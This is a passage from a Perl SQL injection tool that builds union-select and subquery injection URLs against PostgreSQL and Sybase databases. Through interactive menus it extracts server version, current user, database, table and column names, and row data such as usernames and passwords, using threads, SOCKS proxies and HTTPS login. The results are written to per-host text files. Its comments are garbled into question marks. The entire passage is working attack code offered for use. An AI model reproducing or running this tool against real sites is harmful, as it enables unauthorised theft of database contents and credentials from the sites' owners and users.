6110.          print "Enter END_position: ";
6111.          $choice2 = <STDIN>;
6112.          chomp $choice2;
6113.          $column_name_p = $choice2-1;
6114.          print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
6115.     }
6116.     print "-----------------------------------------\n";
6117.     print "Request method - $method\n";
6118.     print "Threads - $kol_threads\n";
6119.     print "Proxy - $proxy_message\n";
6120.     print "----------------------\n";
6121.     ## ?????? ?????? ?? ??????? ##
6122.     $url17 = $p_sql_start . $p_sql_pref1 . "cast(" . $column_name . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_sql_pref2 . $p_sql_end . $p_plus . "from" . $p_plus . $table_name . $p_plus . "limit" . $p_plus . "1";
6123.     for(0..$thr) {
6124.         $trl[$_] = threads->create(\&gets673);
6125.     }
6126.     for(0..$thr) {
6127.         $trl[$_]->join;
6128.     }
6129.     sub gets673 {
6130.             $| = 1;
6131.             while ($num<$column_name_p) {
6132.                { lock($num);
6133.                $num++; }
6134.                $current = $url17 . $p_plus . "offset" . $p_plus . $num . $p_filtr;
6135.                $content = scan_url();
6136.                if ($content =~ m/ussr(.*?)ussr/imgs) {
6137.                     print "   " . $1 . "\n";
6138.                     print FILE "  "  . $1 . "\n";
6139.                }
6140.                print $num . "\r";
6141.                sleep $pause;
6142.  
6143.             }
6144.     }
6145.     print "----------\n";
6146.     print "Saved in " . "z_" . $host . ".txt\n";
6147.     close(FILE);
6148.     goto START_ps;
6149. }
6150. }
6151. ####################################################################################################################
6152.  
6153. ## Subquery method ##
6154. if ($p_method == 1) {
6155. if ($p_subquery_url =~ m/^https:\/\/?([^\/]+)/i) {
6156.        $host8 = $1;
6157.        $https_flag = 1;
6158.        print "----------------------\n";
6159.        print "HTTPS mode enabled\n";
6160.        print "----------------------\n";
6161. }
6162. $host = $host8;
6163. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
6164.     print "-----------------------------------------\n";
6165.     print "Authorization required, wait please....";
6166.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
6167.     $ck1 = collect($answ1);
6168.     $https_auth_check = 1;
6169.     print " DONE\n";
6170.     print "-----------------------------------------\n";
6171. }
6172. print "========================================\n";
6173. print " PostgreSQL SUBQUERY method\n";
6174. print "========================================\n";
6175. if ($choice == 1) {
6176.      open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
6177.      $url1 = $p_subquery_url . "cast(" . $p_sql_pref1 . "version()" . $p_sql_pref2 . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
6178.      $url2 = $p_subquery_url . "cast(" . $p_sql_pref1 . "current_user" . $p_sql_pref2 . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
6179.      $url3 = $p_subquery_url . "cast(" . $p_sql_pref1 . "current_database()" . $p_sql_pref2 . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
6180.      $url4 = $p_subquery_url . "cast(" . $p_sql_pref1 . "inet_server_addr()" . $p_sql_pref2 . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
6181.      $url5 = $p_subquery_url . "cast(" . $p_sql_pref1 . "inet_server_port()" . $p_sql_pref2 . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
6182.      @array = ($url1,$url2,$url3,$url4,$url5);
6183.      $size = @array; #???????? ?????? ???????
6184.      $thr = $kol_threads; # ???-?? ???????
6185.      $num = -1; # ?? ????????
6186.      print "-----------------------------------------\n";
6187.      print "System information:\n";
6188.      print "-----------------------------------------\n";
6189.      print FILE  "-----------------------------------------\n";
6190.      print FILE  "HOST: $host\n";
6191.      print FILE "-----------------------------------------\n";
6192.      print FILE "System information:\n";
6193.      print FILE "-----------------------------------------\n";
6194.      print "Request method - $method\n";
6195.      print "Threads - $kol_threads\n";
6196.      print "Proxy - $proxy_message\n";
6197.      print "----------------------\n";
6198.      for(0..$thr) {
6199.         $trl[$_] = threads->create(\&gets813);
6200.      }
6201.      for(0..$thr) {
6202.         $trl[$_]->join;
6203.      }
6204.      sub gets813 {
6205.         $| = 1;
6206.         while ($num<$size) {
6207.             { lock($num);
6208.             $num++; }
6209.             $current = $array[$num];
6210.             if ($num == 0) {$mess = 'version(): '}
6211.             if ($num == 1) {$mess = "current_user: "}
6212.             if ($num == 2) {$mess = "current_database(): "}
6213.             if ($num == 3) {$mess = "inet_server_addr(): "}
6214.             if ($num == 4) {$mess = "inet_server_port(): "}
6215.             $content = scan_url();
6216.             if ($content =~ m/ussr(.*?)ussr/imgs) {
6217.                   print $mess . $1 . "\n";
6218.                   print FILE $mess . $1 . "\n";
6219.             }
6220.             print $num . "\r";
6221.             sleep $pause;
6222.         }
6223.      }
6224.      print "----------\n";
6225.      print "Saved in " . "z_" . $host . ".txt\n";
6226.      close(FILE);
6227.      goto START_ps;
6228. }
6229. if ($choice == 2) {
6230.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
6231.      $current = $p_subquery_url . "cast((select" . $p_plus . $p_sql_pref1 . "count(*)" . $p_sql_pref2 . $p_plus . "from" . $p_plus . "information_schema.tables)" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
6232.      $content = scan_url();
6233.      $tab_num = $content;
6234.      $tab_num =~ m/ussr(.*?)ussr/imgs;
6235.      $tab_num = $1; # ???-?? ???????? ? informaion_schema
6236.      print "-----------------------------------------\n";
6237.      print "Tables in information_schema.tables - $1\n";
6238.      print "-----------------------------------------\n";
6239.      ## start from2 ##
6240.      print "Get ALL tables from information_schema ($1) ? (1/0): ";
6241.      $choice = <STDIN>;
6242.      chomp $choice;
6243.      $thr = $kol_threads; # ???-?? ???????
6244.      if ($choice == 1) {
6245.           $num = -1; # ?? ????????
6246.      } else {
6247.           print "Enter START_position: ";
6248.           $choice1 = <STDIN>;
6249.           chomp $choice1;
6250.           $num = $choice1-2;
6251.           print "Enter END_position: ";
6252.           $choice2 = <STDIN>;
6253.           chomp $choice2;
6254.           $tab_num = $choice2-1;
6255.           print "Dump records from [" . ($num+2) . "] to [" . ($tab_num+1) . "]\n";
6256.      }
6257.      print "-----------------------------------------\n";
6258.      ## end from2
6259.      print FILE  "-----------------------------------------\n";
6260.      print FILE  "Tables in information_schema.tables - $1\n";
6261.      print FILE  "-----------------------------------------\n";
6262.      $url12 = $p_subquery_url . "cast((select" . $p_plus . $p_sql_pref1 . "table_name" . $p_sql_pref2 . $p_plus . "from" . $p_plus . "information_schema.tables" . $p_plus . "limit" . $p_plus . "1";
6263.      print "Request method - $method\n";
6264.      print "Threads - $kol_threads\n";
6265.      print "Proxy - $proxy_message\n";
6266.      print "----------------------\n";
6267.      for(0..$thr) {
6268.          $trl[$_] = threads->create(\&gets814);
6269.      }
6270.      for(0..$thr) {
6271.          $trl[$_]->join;
6272.      }
6273.      sub gets814 {
6274.        $| = 1;
6275.        while ($num<$tab_num) {
6276.          { lock($num);
6277.          $num++; }
6278.          $current = $url12 . $p_plus . "offset" . $p_plus . $num . ")" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
6279.          $content = scan_url();
6280.          if ($content =~ m/ussr(.*?)ussr/imgs) {
6281.                   print $1 . "\n";
6282.                   print FILE $1 . "\n";
6283.          }
6284.          print $num . "\r";
6285.          sleep $pause;
6286.  
6287.        }
6288.      }
6289.     print "----------\n";
6290.     print "Saved in " . "z_" . $host . ".txt\n";
6291.     close(FILE);
6292.     goto START_ps;
6293. }
6294. if ($choice == 3) {
6295.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
6296.     print "-----------------------------------------\n";
6297.     print "Enter the table_name: ";
6298.     $choice = <STDIN>;
6299.     chomp $choice;
6300.     print "Table: $choice\n";
6301.     print "----------\n";
6302.     print FILE  "-----------------------------------------\n";
6303.     print FILE  "Table [ $choice ]\n";
6304.     print FILE  "-----------------------------------------\n";
6305.     $table_name1 = $choice;
6306.     $table_name = char_p ($choice);
6307.     $current = $p_subquery_url . "cast((select" . $p_plus . $p_sql_pref1 . "count(*)" . $p_sql_pref2 . $p_plus . "from" . $p_plus . "information_schema.columns" . $p_plus . "where" . $p_plus . "table_name=" . $table_name . ")"  . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
6308.     $content = scan_url();
6309.     $content =~ m/ussr(.*?)ussr/imgs;
6310.     $colum_number = $1; # ???-?? ??????? ? ??????????? ?????
6311.     print "Number of columns in " . $table_name1 . ": $colum_number\n";
6312.     print FILE  "Number of columns in " . $table_name1 . ": $colum_number\n";
6313.     print "----------\n";
6314.     ## ?????? ??????? ##
6315.     $thr = $kol_threads; # ???-?? ???????
6316.     $num = -1; # ?? ????????
6317.     print "Request method - $method\n";
6318.     print "Threads - $kol_threads\n";
6319.     print "Proxy - $proxy_message\n";
6320.     print "----------------------\n";
6321.     $url15 = $p_subquery_url . "cast((select" . $p_plus . $p_sql_pref1 . "column_name" . $p_sql_pref2 . $p_plus . "from" . $p_plus . "information_schema.columns" . $p_plus . "where" . $p_plus . "table_name=" . $table_name . $p_plus . "limit" . $p_plus . "1";
6322.     print FILE  "Columns in " . $table_name1 . "\n";
6323.     for(0..$thr) {
6324.          $trl[$_] = threads->create(\&gets815);
6325.     }
6326.     for(0..$thr) {
6327.          $trl[$_]->join;
6328.     }
6329.     sub gets815 {
6330.        $| = 1;
6331.        while ($num<$colum_number) {
6332.          { lock($num);
6333.          $num++; }
6334.          $current = $url15 . $p_plus . "offset" . $p_plus . $num . ")" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
6335.          $content = scan_url();
6336.          if ($content =~ m/ussr(.*?)ussr/imgs) {
6337.                   print "   " . $1 . "\n";
6338.                   print FILE "  "  . $1 . "\n";
6339.          }
6340.          print $num . "\r";
6341.          sleep $pause;
6342.  
6343.        }
6344.     }
6345.     print FILE "----------\n";
6346.     print "----------\n";
6347.     print "Saved in " . "z_" . $host . ".txt\n";
6348.     close(FILE);
6349.     goto START_ps;
6350. }
6351. if ($choice == 4) {
6352.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
6353.     print "-----------------------------------------\n";
6354.     print "Enter the table_name: ";
6355.     $choice = <STDIN>;
6356.     chomp $choice;
6357.     $table_name = $choice;
6358.     print "Table: $table_name\n";
6359.     print "-----------------------------------------\n";
6360.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
6361.     $choice = <STDIN>;
6362.     chomp $choice;
6363.     $column_name1 = $choice;
6364.     $column_name = $choice;
6365.     @column_spis = split(/,/,$column_name);
6366.     $size = @column_spis;
6367.     if ($size > 1) {
6368.        $column_name = "";
6369.        $a = 0;
6370.        while ($a < $size) {
6371.         if ($a == ($size-1)) {
6372.           $column_name .= $column_spis[$a];
6373.         } else {
6374.           $column_name .= $column_spis[$a] . "||chr(58)||";
6375.         }
6376.           $a++;
6377.        }
6378.     }
6379.     print FILE  "-----------------------------------------\n";
6380.     print FILE  "Dump column(s): [ " . $column_name1 . " ] from [ " .$table_name . " ]\n";
6381.     print FILE  "-----------------------------------------\n";
6382.     print "Dump column(s): [ " . $column_name1. " ] from [ " .$table_name . " ]\n";
6383.     print "-----------------------------------------\n";
6384.     ## ?????? ???-?? ???????? ?? ??????? #
6385.     print "Count data from [ $table_name  ]\n";
6386.     $current = $p_subquery_url . "cast((select" . $p_plus . $p_sql_pref1 . "count(*)" . $p_sql_pref2 . $p_plus . "from" . $p_plus . $table_name . ")"  . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
6387.     $content = scan_url();
6388.     $column_name_p = $content;
6389.     $column_name_p =~ m/ussr(.*?)ussr/imgs;
6390.     $column_name_p = $1; # ???-?? ???????? ? ??????? ?? ????????? ???????
6391.     print "$column_name_p\n";
6392.     print "----------\n";
6393.     print "Get ALL data from " . $table_name . " (" . $column_name_p . ") ? (1/0): ";
6394.     $choice = <STDIN>;
6395.     chomp $choice;
6396.     $thr = $kol_threads; # ???-?? ???????
6397.     if ($choice == 1) {
6398.          $num = -1; # ?? ????????
6399.     } else {
6400.          print "Enter START_position: ";
6401.          $choice1 = <STDIN>;
6402.          chomp $choice1;
6403.          $num = $choice1-2;
6404.          print "Enter END_position: ";
6405.          $choice2 = <STDIN>;
6406.          chomp $choice2;
6407.          $column_name_p = $choice2-1;
6408.          print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
6409.     }
6410.     print "-----------------------------------------\n";
6411.     print "Request method - $method\n";
6412.     print "Threads - $kol_threads\n";
6413.     print "Proxy - $proxy_message\n";
6414.     print "----------------------\n";
6415.     ## ?????? ?????? ?? ??????? ##
6416.     $url17 = $p_subquery_url . "cast((select" . $p_plus . $p_sql_pref1 . $column_name . $p_sql_pref2 . $p_plus . "from" . $p_plus . $table_name . $p_plus . "limit" . $p_plus . "1";
6417.     for(0..$thr) {
6418.         $trl[$_] = threads->create(\&gets816);
6419.     }
6420.     for(0..$thr) {
6421.         $trl[$_]->join;
6422.     }
6423.     sub gets816 {
6424.             $| = 1;
6425.             while ($num<$column_name_p) {
6426.                { lock($num);
6427.                $num++; }
6428.                $current = $url17 . $p_plus . "offset" . $p_plus . $num . ")" . $p_plus . "as" . $p_plus . $p_convert . ")" . $p_filtr;
6429.                $content = scan_url();
6430.                if ($content =~ m/ussr(.*?)ussr/img) {
6431.                     print "   " . $1 . "\n";
6432.                     print FILE "  "  . $1 . "\n";
6433.                }
6434.                print $num . "\r";
6435.                sleep $pause;
6436.  
6437.             }
6438.     }
6439.     print "----------\n";
6440.     print "Saved in " . "z_" . $host . ".txt\n";
6441.     close(FILE);
6442.     goto START_ps;
6443. }
6444. }
6445.  #end PosgreSQL
6446. if ($choice == 5) {goto START_global}
6447. }
6448. ######################################################################################################################
6449. ##Sybase SQL ##############
6450. if ($choice == 4) {
6451. START_sb:
6452. if ($s_union_select_url =~ m/^https:\/\/?([^\/]+)/i) {
6453.    $host9 = $1;
6454.    $https_flag = 1;
6455.    print "----------------------\n";
6456.    print "HTTPS mode enabled\n";
6457.    print "----------------------\n";
6458. }
6459. if ($s_subquery_url =~ m/^https:\/\/?([^\/]+)/i) {
6460.    $host9 = $1;
6461.    $https_flag = 1;
6462.    print "----------------------\n";
6463.    print "HTTPS mode enabled\n";
6464.    print "----------------------\n";
6465. }
6466.  
6467. $host = $host9;
6468. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
6469.     print "-----------------------------------------\n";
6470.     print "Authorization required, wait please....";
6471.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
6472.     $ck1 = collect($answ1);
6473.     $https_auth_check = 1;
6474.     print " DONE\n";
6475.     print "-----------------------------------------\n";
6476. }
6477. if ($use_socks == 1 && $socks_check == 0) {
6478.   $check_url = $host;
6479.   our $query = "GET / HTTP/1.$http_protocol\r\n"
6480.            . "Host: $check_host\r\n"
6481.            . "Referer: http://" . $check_url . "\r\n"
6482.            . "Accept: */*\r\n"
6483.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
6484.            . "Connection: close\r\n\r\n";
6485.    print "----------------------------------------\n";
6486.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
6487.    print "Timeout = 5 sec:\n";
6488.    print "----------------------------------------\n";
6489.    $socks_check = 0;
6490.    $check_socks = socks_check();
6491.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
6492.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
6493.   if ($current_proxy_host) {
6494.      $socks_check = 1;
6495.      print "Will use --> $proxy_message\n";
6496.   } else {
6497.      $socks_check = 0;
6498.      $proxy_message = "No";
6499.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
6500.   }
6501. }
6502. sub ascii_to_hex ($) {
6503.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
6504.                $str = "0x" . $str;
6505.              return $str;
6506. }
6507. print "----------------------------------------------------------\n";
6508. print "               Choose mode:\n";
6509. print "----------------------------------------------------------\n";
6510. print "    [1] Sybase SQL inj system information\n";
6511. print "    [2] Sybase SQL inj get DB names from master..syslogins \n";
6512. print "    [3] Sybase SQL inj get tables from DB\n";
6513. print "    [4] Sybase SQL inj get column_name from table\n";
6514. print "    [5] Sybase SQL inj get data from columns\n";
6515. print "    =======================================================\n";
6516. print "    [6] Main menu\n";
6517. print "----------------------------------------------------------\n";
6518. $choice = <STDIN>;
6519. chomp $choice;
6520. print "Your choice: $choice\n";
6521. if ($choice == 1) {
6522.      open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
6523.      if ($s_method == 1) {
6524.          $url1 = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  '@@version' . $s_sql_pref2 . '))' . $s_filtr;
6525.          $url2 = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'user_name()' . $s_sql_pref2 . '))' . $s_filtr;
6526.          $url3 = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  '@@boottime' . $s_sql_pref2 . '))' . $s_filtr;
6527.          $url4 = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  '@@errorlog' . $s_sql_pref2 . '))' . $s_filtr;
6528.  
6529.          $url5 = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  '@@language' . $s_sql_pref2 . '))' . $s_filtr;
6530.          $url6 = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  '@@servername' . $s_sql_pref2 . '))' . $s_filtr;
6531.          $url7 = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'db_name()' . $s_sql_pref2 . '))' . $s_filtr;
6532.          @array = ($url1,$url2,$url3,$url4,$url5,$url6,$url7);
6533.          $size = @array; #???????? ?????? ???????
6534.          print "----------------\n";
6535.          print "SUBQUERY METHOD\n";
6536.          print "----------------\n";
6537.      }
6538.      if ($s_method == 0) {
6539.          $url1 = $ss_sql_start . $s_sql_pref1 .  '@@version' . $s_sql_pref2 . $ss_sql_end . $s_filtr;
6540.          $url2 = $ss_sql_start . $s_sql_pref1 .  'user_name()' . $s_sql_pref2 . $ss_sql_end . $s_filtr;
6541.          $url3 = $ss_sql_start . $s_sql_pref1 .  '@@boottime' . $s_sql_pref2 . $ss_sql_end . $s_filtr;
6542.          $url4 = $ss_sql_start . $s_sql_pref1 .  '@@errorlog' . $s_sql_pref2 . $ss_sql_end . $s_filtr;
6543.          $url5 = $ss_sql_start . $s_sql_pref1 .  '@@language' . $s_sql_pref2 . $ss_sql_end . $s_filtr;
6544.          $url6 = $ss_sql_start . $s_sql_pref1 .  '@@servername' . $s_sql_pref2 . $ss_sql_end . $s_filtr;
6545.          $url7 = $ss_sql_start . $s_sql_pref1 .  'db_name()' . $s_sql_pref2 . $ss_sql_end . $s_filtr;
6546.          @array = ($url1,$url2,$url3,$url4,$url5,$url6,$url7);
6547.          $size = @array; #???????? ?????? ???????
6548.          print "-------------------\n";
6549.          print "UNION SELECT METHOD\n";
6550.          print "-------------------\n";
6551.      }
6552.      print "HOST - $host\n";
6553.      $thr = $kol_threads; # ???-?? ???????
6554.      $num = -1; # ?? ????????
6555.      print "-----------------------------------------\n";
6556.      print "System information:\n";
6557.      print "-----------------------------------------\n";
6558.      print FILE  "-----------------------------------------\n";
6559.      print FILE  "HOST: $host\n";
6560.      print FILE "-----------------------------------------\n";
6561.      print FILE "System information:\n";
6562.      print FILE "-----------------------------------------\n";
6563.      print "Request method - $method\n";
6564.      print "Threads - $kol_threads\n";
6565.      print "Proxy - $proxy_message\n";
6566.      print "----------------------\n";
6567.      for(0..$thr) {
6568.         $trl[$_] = threads->create(\&gets680);
6569.      }
6570.      for(0..$thr) {
6571.         $trl[$_]->join;
6572.      }
6573.      sub gets680 {
6574.         $| = 1;
6575.         while ($num<$size) {
6576.             { lock($num);
6577.             $num++; }
6578.             $current = $array[$num];
6579.             if ($num == 0) {$mess = '@@version: '}
6580.             if ($num == 1) {$mess = "user_name(): "}
6581.             if ($num == 2) {$mess = '@@boottime: '}
6582.             if ($num == 3) {$mess = '@@errorlog: '}
6583.             if ($num == 4) {$mess = '@@language: '}
6584.             if ($num == 5) {$mess = '@@servername: '}
6585.             if ($num == 6) {$mess = 'db_name(): '}
6586.             $content = scan_url();
6587.             if ($content =~ m/ussr(.*?)ussr/imgs) {
6588.                   print $mess . $1 . "\n";
6589.                   print FILE $mess . $1 . "\n";
6590.             }
6591.             print $num . "\r";
6592.             sleep $pause;
6593.         }
6594.      }
6595.      print "----------\n";
6596.      print "Saved in " . "z_" . $host . ".txt\n";
6597.      close(FILE);
6598.      goto START_sb;
6599. }
6600. if ($choice == 2) {
6601.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
6602.      print FILE "=============================================" . "\n";
6603.      print FILE "DB names from master..syslogins:" . "\n";
6604.      print FILE "=============================================" . "\n";
6605.      print "-----------------------------------------\n";
6606.      print "DB names from master..syslogins:\n";
6607.      print "Request method - $method\n";
6608.      print "Threads - 1 (Sybase)\n";
6609.      print "Proxy - $proxy_message\n";
6610.      print "----------------------\n";
6611.      $| = 1;
6612.      $flag = 0;
6613.      $table_name = "";
6614.      $ss = 0;
6615.      while ($flag == 0) {
6616.               $ss++;
6617.             if ($s_method == 1) {
6618.               if ($ss== 1) {
6619.                  $current = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'max(dbname)' . $s_sql_pref2 .  $s_plus . "from" . $s_plus . "master..syslogins))" . $s_filtr;
6620.               } else {
6621.                  $current = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'max(dbname)' . $s_sql_pref2 .  $s_plus . "from" . $s_plus . "master..syslogins" . $s_plus . "where" . $s_plus . "dbname" . $s_plus . "not" . $s_plus . "in" . $s_plus . "(" . $table_name .  ")))" . $s_filtr;
6622.               }
6623.             }
6624.             if ($s_method == 0) {
6625.               if ($ss== 1) {
6626.                  $current = $ss_sql_start . $s_sql_pref1 .  'max(dbname)' . $s_sql_pref2 . $ss_sql_end . $s_plus . "from" . $s_plus . "master..syslogins" . $s_filtr;
6627.               } else {
6628.                  $current = $ss_sql_start . $s_sql_pref1 .  'max(dbname)' . $s_sql_pref2 . $ss_sql_end . $s_plus . "from" . $s_plus . "master..syslogins"  . $s_plus . "where" . $s_plus . "dbname" . $s_plus . "not" . $s_plus . "in" . $s_plus . "(" . $table_name .  ")" . $s_filtr;
6629.               }
6630.             }
6631.               $content = scan_url();
6632.               if ($content =~ m/ussr(.*?)ussr/imgs) {
6633.                   if ($ss == 1) {
6634.                        $table_name = ascii_to_hex($1);
6635.                   }
6636.                   if ($ss > 1) {
6637.                        $table_name .= "," . ascii_to_hex($1);
6638.                   }
6639.                   print FILE $1 . "\n";
6640.                   print $1 . "\n";
6641.               } else {
6642.                   $flag = 1;
6643.               }
6644.               print $ss . "\r";
6645.               sleep $pause;
6646.      }
6647.      print "----------\n";
6648.      print "Saved in " . "z_" . $host . ".txt\n";
6649.      close(FILE);
6650.      goto START_sb;
6651. }
6652. if ($choice == 3) {
6653.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
6654.      print "-----------------------------------------\n";
6655.      print "Enter DB name for get tables name:\n";
6656.      print "-----------------------------------------\n";
6657.      $choice = <STDIN>;
6658.      chomp $choice;
6659.      $db_name = $choice;
6660.      print "DB name: " . $db_name . "\n";
6661.      print FILE "=============================================" . "\n";
6662.      print FILE "Tables names from " .  $db_name . "\n";
6663.      print FILE "=============================================" . "\n";
6664.      print "-----------------------------------------\n";
6665.      print "Tables names from " .  $db_name . "\n";
6666.      print "Request method - $method\n";
6667.      print "Threads - 1 (Sybase)\n";
6668.      print "Proxy - $proxy_message\n";
6669.      print "----------------------\n";
6670.      $| = 1;
6671.      $flag = 0;
6672.      $table_name = "";
6673.      $table_id = "";
6674.      $ss = 0;
6675.      while ($flag == 0) {
6676.               $ss++;
6677.            if ($s_method == 1) {
6678.               if ($ss== 1) {
6679.                  $current = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'max(name||0x3a||convert(char,id))' . $s_sql_pref2 .  $s_plus . "from" . $s_plus . $db_name . "..sysobjects" . $s_plus . "where" . $s_plus . "type=0x55))" . $s_filtr;
6680.               } else {
6681.                  $current = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'max(name||0x3a||convert(char,id))' . $s_sql_pref2 .  $s_plus . "from" . $s_plus . $db_name . "..sysobjects" . $s_plus . "where" . $s_plus . "type=0x55" . $s_plus . "and" . $s_plus . "id" . $s_plus . "not" . $s_plus . "in" . $s_plus . "(" . $table_id .  ")))" . $s_filtr;
6682.               }
6683.             }
6684.             if ($s_method == 0) {
6685.               if ($ss== 1) {
6686.                  $current = $ss_sql_start . $s_sql_pref1 .  'max(name||0x3a||convert(char,id))' . $s_sql_pref2 . $ss_sql_end .  $s_plus . "from" . $s_plus . $db_name . "..sysobjects" . $s_plus . "where" . $s_plus . "type=0x55" . $s_filtr;
6687.               } else {
6688.                  $current = $ss_sql_start . $s_sql_pref1 .  'max(name||0x3a||convert(char,id))' . $s_sql_pref2 . $ss_sql_end .  $s_plus . "from" . $s_plus . $db_name . "..sysobjects" . $s_plus . "where" . $s_plus . "type=0x55" . $s_plus . "and" . $s_plus . "id" . $s_plus . "not" . $s_plus . "in" . $s_plus . "(" . $table_id .  ")" . $s_filtr;
6689.               }
6690.             }
6691.               $content = scan_url();
6692.               if ($content =~ m/ussr(.*?)ussr/imgs) {
6693.               ($table_name,$table_id1) = split(/:/,$1);
6694.                   if ($ss == 1) {
6695.                        $table_id = $table_id1;
6696.                   }
6697.                   if ($ss > 1) {
6698.                        $table_id .= "," . $table_id1;
6699.                   }
6700.                   print FILE "DB [" . $db_name . "], table name [" . $table_name . "], id: --> " . $table_id1 . "\n";
6701.                   print "DB [" . $db_name . "], table name [" . $table_name . "], id: --> " . $table_id1 . "\n";
6702.               } else {
6703.                   $flag = 1;
6704.               }
6705.               print $ss . "\r";
6706.               sleep $pause;
6707.      }
6708.      print "----------\n";
6709.      print "Saved in " . "z_" . $host . ".txt\n";
6710.      close(FILE);
6711.      goto START_sb;
6712. }
6713. if ($choice == 4) {
6714.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
6715.      print "-----------------------------------------\n";
6716.      print "Enter DB name:\n";
6717.      print "-----------------------------------------\n";
6718.      $choice = <STDIN>;
6719.      chomp $choice;
6720.      $db_name = $choice;
6721.      print "DB name: " . $db_name . "\n";
6722.      print "-----------------------------------------\n";
6723.      print "Enter table ID for get columns name:\n";
6724.      print "-----------------------------------------\n";
6725.      $choice = <STDIN>;
6726.      chomp $choice;
6727.      $table_id = $choice;
6728.      print "Table ID: " . $table_id . "\n";
6729.      print FILE "=============================================" . "\n";
6730.      print FILE "Columns names from DB [" . $db_name . "] and table with ID: " .  $table_id . "\n";
6731.      print FILE "=============================================" . "\n";
6732.      print "-----------------------------------------\n";
6733.      print "Columns names from DB [" . $db_name . "] and table with ID: " .  $table_id . "\n";
6734.      print "Request method - $method\n";
6735.      print "Threads - 1 (Sybase)\n";
6736.      print "Proxy - $proxy_message\n";
6737.      print "----------------------\n";
6738.      $| = 1;
6739.      $flag = 0;
6740.      $column_name = "";
6741.      $column_id = "";
6742.      $ss = 0;
6743.      while ($flag == 0) {
6744.               $ss++;
6745.            if ($s_method == 0) {
6746.               if ($ss== 1) {
6747.                  $current = $ss_sql_start . $s_sql_pref1 .  'max(name||0x3a||convert(char,colid))' . $s_sql_pref2 . $ss_sql_end . $s_plus . "from" . $s_plus . $db_name . "..syscolumns" . $s_plus . "where" . $s_plus . "id=" . $table_id . $s_filtr;
6748.               } else {
6749.                  $current = $ss_sql_start . $s_sql_pref1 .  'max(name||0x3a||convert(char,colid))' . $s_sql_pref2 . $ss_sql_end . $s_plus . "from" . $s_plus . $db_name . "..syscolumns" . $s_plus . "where" . $s_plus . "id=" . $table_id . $s_plus . "and" . $s_plus . "colid" . $s_plus . "not" . $s_plus . "in" . $s_plus . "(" . $column_id .  ")" . $s_filtr;
6750.               }
6751.            }
6752.            if ($s_method == 1) {
6753.               if ($ss== 1) {
6754.                  $current = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'max(name||0x3a||convert(char,colid))' . $s_sql_pref2 .  $s_plus . "from" . $s_plus . $db_name . "..syscolumns" . $s_plus . "where" . $s_plus . "id=" . $table_id .  "))" . $s_filtr;
6755.               } else {
6756.                  $current = $s_subquery_url . "convert(" . $s_convert . ",(select" . $s_plus . $s_sql_pref1 .  'max(name||0x3a||convert(char,colid))' . $s_sql_pref2 .  $s_plus . "from" . $s_plus . $db_name . "..syscolumns" . $s_plus . "where" . $s_plus . "id=" . $table_id . $s_plus . "and" . $s_plus . "colid" . $s_plus . "not" . $s_plus . "in" . $s_plus . "(" . $column_id .  ")))" . $s_filtr;
6757.               }
6758.            }
6759.               $content = scan_url();
6760.               if ($content =~ m/ussr(.*?)ussr/imgs) {
6761.               ($column_name,$column_id1) = split(/:/,$1);
6762.                   if ($ss == 1) {
6763.                        $column_id = $column_id1;
6764.                   }
6765.                   if ($ss > 1) {
6766.                        $column_id .= "," . $column_id1;
6767.                   }
